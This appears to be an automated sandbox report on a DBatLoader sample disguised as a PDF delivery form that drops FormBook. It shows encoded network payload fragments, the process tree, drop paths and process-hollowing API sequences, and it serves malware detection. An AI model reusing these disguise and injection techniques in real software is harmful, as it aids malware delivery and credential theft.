2024-12-19 06:58:01 UTC	4939	IN	Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 65 47 52 41 54 44 68 59 61 48 69 45 6e 45 77 38 63 48 77 38 50 46 69 63 6e 4a 53 63 57 49 69 55 64 48 52 45 59 4a 52 6b 59 45 78 63 4f 45 52 34 66 4a 52 71 6d 72 71 56 5a 49 36 65 78 53 30 34 64 44 79 55 51 4a 52 73 6c 4a 42 49 64 70 71 36 6c 57 53 4f 6e 73 55 74 6d 63 33 52 35 64 6d 35 79 5a 6d 74 64 65 58 56 77 5a 58 56 31 62 6c 31 64 58 31 31 75 61 6c 39 6e 5a 33 74 73 58 33 4e 73 65 57 31 32 65 32 5a 6c 58 33 4a 6d 63 33 52 35 64 6d 35 79 5a 6d 74 64 65 58 56 77 5a 58 56 31 62 6c 31 64 58 31 31 75 61 6c 39 6e 5a 33 74 73 58 33 4e 73 65 57 31 32 65 32 5a 6c 58 33 4a 6d 63 33 52 35 64 6d 35 79 5a 6d 74 64 65 58 56 77 5a 58 56 31 62 6c 31 64 58 31 31 75 61 6c 39 6e 5a 33 74 73 58 33 4e 73 65 57 31 32 65 32 5a 6c 58 33 4a Data Ascii: pq6lWSOnsUseGRATDhYaHiEnEw8cHw8PFicnJScWIiUdHREYJRkYExcOER4fJRqmrqVZI6exS04dDyUQJRslJBIdpq6lWSOnsUtmc3R5dm5yZmtdeXVwZXV1bl1dX11ual9nZ3tsX3NseW12e2ZlX3Jmc3R5dm5yZmtdeXVwZXV1bl1dX11ual9nZ3tsX3NseW12e2ZlX3Jmc3R5dm5yZmtdeXVwZXV1bl1dX11ual9nZ3tsX3NseW12e2ZlX3J
2024-12-19 06:58:01 UTC	4817	IN	Data Raw: 4a 63 50 6a 6f 69 49 38 31 31 57 4b 67 35 44 36 4c 36 63 77 2f 34 5a 41 2b 54 62 4d 54 4f 50 4c 4a 4a 70 4f 43 32 69 4f 6a 48 62 41 48 67 50 4c 41 43 75 63 68 42 68 45 32 61 30 64 54 74 36 71 39 44 61 4b 59 61 53 79 57 2b 2f 45 55 34 68 41 4d 42 76 39 62 49 2f 38 6f 65 79 34 6d 33 79 67 46 4c 4e 4e 4e 68 46 5a 62 31 76 30 4a 42 37 51 33 69 30 55 78 44 68 44 42 47 7a 64 44 53 46 32 36 38 4e 7a 71 6d 72 42 30 6f 35 6b 45 78 71 55 52 68 4c 71 6c 45 56 39 7a 51 4e 48 61 57 34 54 59 73 74 4f 2f 30 41 6c 4f 33 53 76 35 4a 46 35 4a 45 75 39 66 45 72 4f 54 69 77 59 32 53 36 4d 72 54 6f 51 66 48 5a 6c 66 55 61 67 78 42 4e 32 42 52 69 43 4c 54 46 44 6e 2b 36 44 46 69 42 6d 35 76 61 61 6c 79 73 73 69 45 78 38 6e 63 78 48 53 35 6a 32 47 76 56 6a 78 51 67 30 57 6a 67 Data Ascii: JcPjoiI811WKg5D6L6cw/4ZA+TbMTOPLJJpOC2iOjHbAHgPLACuchBhE2a0dTt6q9DaKYaSyW+/EU4hAMBv9bI/8oey4m3ygFLNNNhFZb1v0JB7Q3i0UxDhDBGzdDSF268NzqmrB0o5kExqURhLqlEV9zQNHaW4TYstO/0AlO3Sv5JF5JEu9fErOTiwY2S6MrToQfHZlfUagxBN2BRiCLTFDn+6DFiBm5vaalyssiEx8ncxHS5j2GvVjxQg0Wjg
2024-12-19 06:58:01 UTC	1326	IN	Data Raw: 37 4e 33 31 38 44 57 33 6c 48 6b 50 49 62 72 62 70 57 6b 57 78 38 59 37 56 33 49 37 6a 6e 2f 48 5a 65 4f 74 34 68 79 64 4a 52 72 39 37 56 77 45 54 78 34 31 44 62 4b 48 4f 77 66 35 78 7a 55 30 74 42 66 63 71 68 51 54 55 55 57 43 52 43 73 48 42 4f 39 74 65 2b 2f 32 74 35 43 38 2f 49 6b 58 35 5a 55 43 6c 67 61 45 43 6d 37 59 50 57 4a 4e 6b 77 69 4b 74 78 6e 42 62 7a 5a 4f 58 52 31 31 42 58 6b 38 62 57 34 2b 61 2b 55 55 4f 74 47 37 34 30 6d 4c 49 7a 4c 41 67 41 38 72 37 72 42 50 44 6c 52 31 76 36 34 4a 70 66 64 56 49 54 70 55 4e 35 4f 64 33 38 68 51 6d 48 6d 53 4e 35 64 42 50 4e 5a 71 30 66 6a 58 75 64 4b 52 4b 78 6a 49 57 75 6e 68 77 4c 44 70 31 51 5a 5a 49 6f 6f 75 32 59 5a 4b 51 32 50 54 57 31 69 39 4f 47 36 2f 4c 2f 43 41 64 64 4f 39 46 61 59 2f 30 4d 55 Data Ascii: 7N318DW3lHkPIbrbpWkWx8Y7V3I7jn/HZeOt4hydJRr97VwETx41DbKHOwf5xzU0tBfcqhQTUUWCRCsHBO9te+/2t5C8/IkX5ZUClgaECm7YPWJNkwiKtxnBbzZOXR11BXk8bW4+a+UUOtG740mLIzLAgA8r7rBPDlR1v64JpfdVITpUN5Od38hQmHmSN5dBPNZq0fjXudKRKxjIWunhwLDp1QZZIoou2YZKQ2PTW1i9OG6/L/CAddO9FaY/0MU
2024-12-19 06:58:01 UTC	1390	IN	Data Raw: 72 64 65 30 6e 5a 39 6e 58 73 6b 4d 6a 6f 69 78 74 70 35 4f 74 49 56 78 72 45 61 6f 58 74 6e 6f 38 55 34 48 61 62 32 4a 4b 38 34 54 45 48 62 67 37 69 47 6d 76 58 37 51 4d 4d 72 32 36 39 59 30 75 39 50 67 70 56 34 31 67 35 42 57 32 71 35 31 6b 61 58 66 76 47 4e 6e 69 4a 6d 38 2b 77 65 6a 2f 52 53 64 44 72 62 55 42 50 78 78 41 59 49 51 36 53 30 66 35 74 46 55 78 50 77 78 36 46 70 4c 75 74 75 48 39 35 4e 31 46 74 43 63 31 43 45 77 75 4e 48 4d 67 6d 71 7a 34 4c 68 50 71 4c 65 65 4c 4a 74 6d 52 49 57 39 46 71 44 47 58 78 50 4b 74 54 79 7a 6f 41 67 47 50 57 38 4f 61 2f 46 34 53 52 56 30 2f 54 6c 4b 53 79 71 70 78 77 47 35 66 55 50 6f 30 63 4a 68 35 72 54 36 6c 52 59 64 59 6b 37 6e 4c 38 6d 62 55 56 6d 37 6d 69 55 65 6f 79 34 73 6d 78 66 77 73 6b 54 37 41 66 55 Data Ascii: rde0nZ9nXskMjoixtp5OtIVxrEaoXtno8U4Hab2JK84TEHbg7iGmvX7QMMr269Y0u9PgpV41g5BW2q51kaXfvGNniJm8+wej/RSdDrbUBPxxAYIQ6S0f5tFUxPwx6FpLutuH95N1FtCc1CEwuNHMgmqz4LhPqLeeLJtmRIW9FqDGXxPKtTyzoAgGPW8Oa/F4SRV0/TlKSyqpxwG5fUPo0cJh5rT6lRYdYk7nL8mbUVm7miUeoy4smxfwskT7AfU
2024-12-19 06:58:01 UTC	1390	IN	Data Raw: 32 76 4b 6f 54 52 48 6f 57 61 47 42 31 45 64 64 64 4a 61 68 70 38 38 36 79 6f 64 55 4d 62 4d 50 72 36 4b 4d 72 30 2f 75 62 38 76 72 31 6b 66 51 52 47 65 6e 4c 57 65 44 6b 6f 6b 76 72 6b 73 2b 42 6f 32 66 67 67 47 6c 51 41 51 70 79 52 46 6d 41 71 75 65 72 6b 2f 65 47 41 37 49 6e 65 46 52 46 4a 33 54 66 65 73 65 7a 48 70 4e 6f 4e 4f 70 39 4c 6e 57 54 34 30 75 56 6a 30 66 6d 5a 46 72 32 58 58 6c 70 78 70 33 2b 39 4d 6c 69 32 66 6a 56 33 42 32 57 50 76 51 63 62 77 79 78 53 43 78 64 41 57 55 33 61 42 30 74 4f 74 35 41 38 41 6b 4f 74 70 58 6b 72 39 37 43 34 7a 47 66 70 4b 31 57 48 50 54 78 6f 39 78 72 44 59 66 34 69 77 30 5a 71 76 52 6f 7a 74 73 65 73 36 43 34 72 37 54 6f 76 43 6e 78 4d 77 62 73 6e 33 6a 4b 6b 45 35 63 4c 56 71 6e 41 72 61 36 55 2f 52 71 69 34 Data Ascii: 2vKoTRHoWaGB1EdddJahp886yodUMbMPr6KMr0/ub8vr1kfQRGenLWeDkokvrks+Bo2fggGlQAQpyRFmAquerk/eGA7IneFRFJ3TfesezHpNoNOp9LnWT40uVj0fmZFr2XXlpxp3+9Mli2fjV3B2WPvQcbwyxSCxdAWU3aB0tOt5A8AkOtpXkr97C4zGfpK1WHPTxo9xrDYf4iw0ZqvRoztses6C4r7TovCnxMwbsn3jKkE5cLVqnAra6U/Rqi4
2024-12-19 06:58:01 UTC	1390	IN	Data Raw: 72 44 4e 6a 76 42 65 69 70 53 65 6c 62 4e 73 35 63 4a 75 51 61 5a 4d 31 74 66 46 6c 46 32 7a 67 79 6c 4b 44 6d 66 35 75 52 6b 38 58 51 6b 6d 50 7a 75 6e 62 33 4a 74 51 68 71 57 34 35 4c 64 67 42 56 56 43 76 75 44 59 59 69 56 46 42 71 42 65 54 6c 56 63 2b 2b 33 38 4a 58 52 4e 43 5a 2b 6c 30 4a 31 48 77 79 53 47 62 43 41 62 31 7a 57 6d 48 54 57 51 63 56 79 78 43 64 48 54 75 72 44 45 71 77 69 69 38 70 75 31 54 57 59 7a 67 50 69 6b 76 4f 4f 34 45 44 32 76 78 62 76 6d 46 32 59 4a 37 56 4a 51 36 31 51 33 59 5a 53 55 31 32 6c 57 6d 35 5a 76 56 79 6d 7a 75 4a 63 4e 48 39 77 43 4c 6b 4e 36 78 64 4f 6f 57 57 58 56 68 6f 6d 36 4d 73 63 2b 7a 78 73 57 6a 51 36 79 5a 6e 34 35 36 46 4a 66 43 43 42 4a 69 2f 57 4e 47 4d 74 37 30 70 33 2b 47 62 66 38 36 49 53 6d 63 6c 43 Data Ascii: rDNjvBeipSelbNs5cJuQaZM1tfFlF2zgylKDmf5uRk8XQkmPzunb3JtQhqW45LdgBVVCvuDYYiVFBqBeTlVc++38JXRNCZ+l0J1HwySGbCAb1zWmHTWQcVyxCdHTurDEqwii8pu1TWYzgPikvOO4ED2vxbvmF2YJ7VJQ61Q3YZSU12lWm5ZvVymzuJcNH9wCLkN6xdOoWWXVhom6Msc+zxsWjQ6yZn456FJfCCBJi/WNGMt70p3+Gbf86ISmclC
2024-12-19 06:58:01 UTC	1390	IN	Data Raw: 6d 31 71 5a 30 42 4f 4c 41 50 63 6d 72 36 33 30 38 59 75 4f 71 46 66 46 73 6e 58 39 66 42 4e 46 52 6c 50 78 49 34 61 52 41 36 47 66 31 4f 70 74 43 61 65 6b 46 2b 4a 47 65 73 4a 34 38 4b 68 54 4a 74 36 58 39 50 47 49 31 5a 6d 66 2f 7a 62 63 30 42 4c 6d 5a 31 52 74 6f 31 65 48 35 53 34 54 77 4e 7a 50 4f 57 43 43 57 41 56 57 41 59 79 47 6b 38 65 2f 50 34 30 75 48 6e 76 76 43 72 56 53 78 55 6d 77 48 59 6e 7a 43 49 65 70 79 51 66 63 49 56 64 52 4d 6a 4c 72 77 71 6e 6b 6f 77 54 41 79 75 78 4d 33 49 6a 72 63 31 50 4e 6a 36 78 65 67 48 6f 39 47 4d 76 50 38 50 41 52 56 79 76 6f 31 77 67 44 35 57 53 51 37 35 54 63 35 67 74 71 41 52 35 64 56 46 41 78 6e 52 6f 68 65 4c 4b 4d 65 63 4e 75 67 4a 70 63 50 50 43 42 64 5a 71 6f 32 4c 58 55 46 33 62 62 4b 49 65 6b 45 51 64 Data Ascii: m1qZ0BOLAPcmr6308YuOqFfFsnX9fBNFRlPxI4aRA6Gf1OptCaekF+JGesJ48KhTJt6X9PGI1Zmf/zbc0BLmZ1Rto1eH5S4TwNzPOWCCWAVWAYyGk8e/P40uHnvvCrVSxUmwHYnzCIepyQfcIVdRMjLrwqnkowTAyuxM3Ijrc1PNj6xegHo9GMvP8PARVyvo1wgD5WSQ75Tc5gtqAR5dVFAxnRoheLKMecNugJpcPPCBdZqo2LXUF3bbKIekEQd
2024-12-19 06:58:01 UTC	1390	IN	Data Raw: 50 34 7a 4a 59 50 6b 5a 6a 43 76 38 50 30 58 72 54 77 73 41 57 55 6f 4d 78 74 34 51 35 48 55 69 42 67 6b 78 56 71 45 32 34 72 44 69 46 33 33 53 54 64 31 5a 69 66 48 6a 44 45 48 64 6e 78 74 35 74 64 49 49 59 4e 68 54 4d 50 52 74 51 6f 32 68 52 57 41 6f 6d 77 46 32 4b 76 38 37 4b 6c 64 68 62 79 6e 55 55 79 74 66 44 4e 49 32 6f 4b 5a 71 6a 55 57 35 4a 78 79 62 33 30 62 59 75 71 65 30 6d 38 4d 43 4b 47 48 46 6a 78 53 63 79 76 33 57 56 38 2b 42 6e 59 64 6f 66 71 74 4f 6b 53 51 32 70 64 77 6a 66 4d 34 4b 53 6b 6b 50 37 4e 74 43 44 78 4f 67 30 6f 54 32 59 73 73 42 75 41 35 34 63 54 44 6d 35 49 51 41 48 55 69 62 54 6f 70 57 65 36 75 4f 61 6c 65 71 6f 4b 6c 51 56 59 37 36 32 4c 56 6f 30 78 49 69 71 63 63 4c 64 6a 72 4d 57 4b 34 51 6a 47 39 64 51 56 2b 45 7a 56 47 Data Ascii: P4zJYPkZjCv8P0XrTwsAWUoMxt4Q5HUiBgkxVqE24rDiF33STd1ZifHjDEHdnxt5tdIIYNhTMPRtQo2hRWAomwF2Kv87KldhbynUUytfDNI2oKZqjUW5Jxyb30bYuqe0m8MCKGHFjxScyv3WV8+BnYdofqtOkSQ2pdwjfM4KSkkP7NtCDxOg0oT2YssBuA54cTDm5IQAHUibTopWe6uOaleqoKlQVY762LVo0xIiqccLdjrMWK4QjG9dQV+EzVG
2024-12-19 06:58:01 UTC	1390	IN	Data Raw: 76 43 54 38 36 46 65 46 52 61 31 6a 4e 32 2b 43 37 69 31 6b 32 4a 71 38 4a 77 2f 70 5a 77 4f 69 64 71 6e 54 76 42 61 47 6b 50 47 66 7a 5a 33 45 37 39 58 4e 7a 63 41 2f 38 35 35 75 6f 4a 46 2b 46 6a 6e 57 73 39 62 55 65 43 71 4f 4e 49 44 76 4f 41 57 2b 38 39 59 74 6b 39 72 65 65 36 77 30 56 73 2b 32 74 38 49 79 4b 74 35 47 4d 6d 6a 4c 51 57 30 71 6e 66 75 39 70 4e 38 79 71 78 73 63 69 41 49 62 6d 63 58 6f 49 33 67 4f 6e 59 49 53 70 4f 4e 6d 6a 2f 73 50 65 55 6a 32 47 6b 63 46 79 79 36 41 65 4b 72 65 6b 45 34 34 54 69 65 2b 4c 50 54 6c 31 37 55 6d 41 50 66 75 71 66 41 6f 55 32 61 65 6c 74 79 58 4a 36 7a 77 6a 65 54 46 44 68 52 76 6a 6a 4b 32 76 4e 2f 51 54 4a 64 4e 44 70 66 44 4d 43 77 7a 6e 44 4a 47 54 75 69 73 4b 45 45 6c 6f 48 56 4f 73 61 59 54 65 6f 48 Data Ascii: vCT86FeFRa1jN2+C7i1k2Jq8Jw/pZwOidqnTvBaGkPGfzZ3E79XNzcA/855uoJF+FjnWs9bUeCqONIDvOAW+89Ytk9ree6w0Vs+2t8IyKt5GMmjLQW0qnfu9pN8yqxsciAIbmcXoI3gOnYISpONmj/sPeUj2GkcFyy6AeKrekE44Tie+LPTl17UmAPfuqfAoU2aeltyXJ6zwjeTFDhRvjjK2vN/QTJdNDpfDMCwznDJGTuisKEEloHVOsaYTeoH
2024-12-19 06:58:01 UTC	1390	IN	Data Raw: 33 4e 75 55 6e 32 68 6a 38 6c 50 67 32 69 77 2b 4a 4b 75 51 36 4f 5a 37 39 79 38 2b 77 48 34 75 71 47 47 64 69 6f 56 58 65 53 54 70 78 71 6e 45 71 4f 62 41 33 74 76 54 37 2b 53 7a 66 67 4c 6a 68 63 6d 77 79 6b 70 65 6c 51 70 53 43 5a 7a 59 71 58 76 6b 36 69 77 4e 47 71 69 77 4a 59 71 62 78 4b 39 63 37 55 5a 69 35 76 66 59 68 4d 55 62 4c 53 30 56 6e 54 4e 45 4f 61 53 78 69 65 4c 6f 65 50 79 55 36 6e 63 41 55 75 49 4e 70 6f 34 69 4f 6e 30 63 63 33 73 78 58 47 34 4b 2f 5a 4d 55 4d 57 6e 34 66 67 61 2b 33 38 59 79 4e 66 46 64 50 6e 73 59 57 6f 67 46 33 51 37 77 79 37 56 66 45 63 4e 73 4c 6f 6c 7a 57 36 31 75 50 4f 4e 46 38 74 48 4e 6f 6a 54 53 6c 4e 2f 4c 63 2b 4a 58 79 36 6c 38 73 74 4b 41 4c 71 71 57 65 64 4f 31 2f 61 7a 6d 70 75 36 65 75 66 6d 39 41 41 31 Data Ascii: 3NuUn2hj8lPg2iw+JKuQ6OZ79y8+wH4uqGGdioVXeSTpxqnEqObA3tvT7+SzfgLjhcmwykpelQpSCZzYqXvk6iwNGqiwJYqbxK9c7UZi5vfYhMUbLS0VnTNEOaSxieLoePyU6ncAUuINpo4iOn0cc3sxXG4K/ZMUMWn4fga+38YyNfFdPnsYWogF3Q7wy7VfEcNsLolzW61uPONF8tHNojTSlN/Lc+JXy6l8stKALqqWedO1/azmpu6eufm9AA1

Target ID:	0
Start time:	01:57:51
Start date:	19/12/2024
Path:	C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe"
Imagebase:	0x400000
File size:	1'362'944 bytes
MD5 hash:	72AB2A99902EC6F67B0D4DF67820328E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2127061894.000000007FB00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2294905471.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2253685238.0000000002406000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:58:02
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:58:02
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:58:02
Start date:	19/12/2024
Path:	C:\Users\Public\Libraries\xnxcxbpC.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\xnxcxbpC.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2690787267.00000000228E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:58:13
Start date:	19/12/2024
Path:	C:\Users\Public\Libraries\Cpbxcxnx.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Cpbxcxnx.PIF"
Imagebase:	0x400000
File size:	1'362'944 bytes
MD5 hash:	72AB2A99902EC6F67B0D4DF67820328E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:58:13
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 5764, Parent PID: 5712

General

Target ID:	11
Start time:	01:58:13
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:58:14
Start date:	19/12/2024
Path:	C:\Users\Public\Libraries\xnxcxbpC.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\xnxcxbpC.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2769119926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2792693070.000000001CB90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:58:21
Start date:	19/12/2024
Path:	C:\Users\Public\Libraries\Cpbxcxnx.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Cpbxcxnx.PIF"
Imagebase:	0x400000
File size:	1'362'944 bytes
MD5 hash:	72AB2A99902EC6F67B0D4DF67820328E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:58:24
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	01:58:25
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:58:25
Start date:	19/12/2024
Path:	C:\Users\Public\Libraries\xnxcxbpC.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\xnxcxbpC.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2833990663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2863377435.000000002C280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	15%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10.1%
Total number of Nodes:	296
Total number of Limit Nodes:	16

Executed Functions

Function 02CE8BB0 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CE8824: LoadLibraryA.KERNEL32(00000000,00000000,02CE890B), ref: 02CE8858
Part of subcall function 02CE8824: FreeLibrary.KERNEL32(74F60000,00000000,02D31388,Function_000065D8,00000004,02D31398,02D31388,05F5E0FF,00000040,02D3139C,74F60000,00000000,00000000,00000000,00000000,02CE890B), ref: 02CE88EB

Part of subcall function 02CE85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CE8668

GetThreadContext.KERNEL32(00000864,02D31420,ScanString,02D313A4,02CEA77C,UacInitialize,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,UacInitialize,02D313A4), ref: 02CE9442

Part of subcall function 02CE8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE82C5

Part of subcall function 02CE84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02CE8529

Part of subcall function 02CE79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CE7A27

Part of subcall function 02CE7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE7D74

SetThreadContext.KERNEL32(00000864,02D31420,ScanBuffer,02D313A4,02CEA77C,ScanString,02D313A4,02CEA77C,Initialize,02D313A4,02CEA77C,00000874,00252FF8,02D314F8,00000004,02D314FC), ref: 02CEA157
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000864,00000000,00000864,02D31420,ScanBuffer,02D313A4,02CEA77C,ScanString,02D313A4,02CEA77C,Initialize,02D313A4,02CEA77C,00000874,00252FF8,02D314F8), ref: 02CEA164

Part of subcall function 02CE87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize,02D313A4,02CEA77C,UacScan), ref: 02CE87B4
Part of subcall function 02CE87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CE87CE
Part of subcall function 02CE87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize), ref: 02CE880A

Strings

BCryptQueryProviderRegistration, xrefs: 02CEA3C7
OpenSession, xrefs: 02CE8BE9, 02CE900C, 02CE90BE, 02CEA48F, 02CEA5D5
MiniDumpWriteDump, xrefs: 02CEA554
dbgcore, xrefs: 02CEA559, 02CEA56D
BCryptVerifySignature, xrefs: 02CEA3B3
UacScan, xrefs: 02CE8CB3, 02CE8ECB, 02CE94C7, 02CE98C3, 02CE9A37, 02CEA1E1, 02CEA679
UacInitialize, xrefs: 02CE8E72, 02CE91D3, 02CE9352, 02CE9456, 02CE9852, 02CE99C6, 02CEA170
bcrypt, xrefs: 02CEA3B8, 02CEA3CC, 02CEA3E0
NtSetSecurityObject, xrefs: 02CEA6CF
ntdll, xrefs: 02CEA465, 02CEA479, 02CEA531, 02CEA6D4, 02CEA6E8
ScanString, xrefs: 02CE8C42, 02CE8DED, 02CE8F9B, 02CE93C3, 02CE95A9, 02CE9730, 02CE9BBD, 02CE9D7B, 02CE9EEB, 02CEA05E, 02CEA349, 02CEA3F6
NtOpenProcess, xrefs: 02CEA6E3
SLGetLicenseInformation, xrefs: 02CE919F
sppc, xrefs: 02CE91B6
NtOpenObjectAuditAlarm, xrefs: 02CEA474, 02CEA52C
I_QueryTagInformation, xrefs: 02CEA540
BCryptRegisterProvider, xrefs: 02CEA3DB
advapi32, xrefs: 02CEA545
Initialize, xrefs: 02CE8F2A, 02CE9538, 02CE96BF, 02CE9AA8, 02CE9D0A, 02CE9E7A, 02CE9FED, 02CEA252, 02CEA583
ScanBuffer, xrefs: 02CE8D0C, 02CE8D94, 02CE912F, 02CE9244, 02CE92E1, 02CE961A, 02CE97A1, 02CE9934, 02CE9B19, 02CE9C2E, 02CE9DEC, 02CE9F5C, 02CEA0CF, 02CEA2C3, 02CEA4E1, 02CEA627
MiniDumpReadDumpStream, xrefs: 02CEA568
NtReadVirtualMemory, xrefs: 02CEA460

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

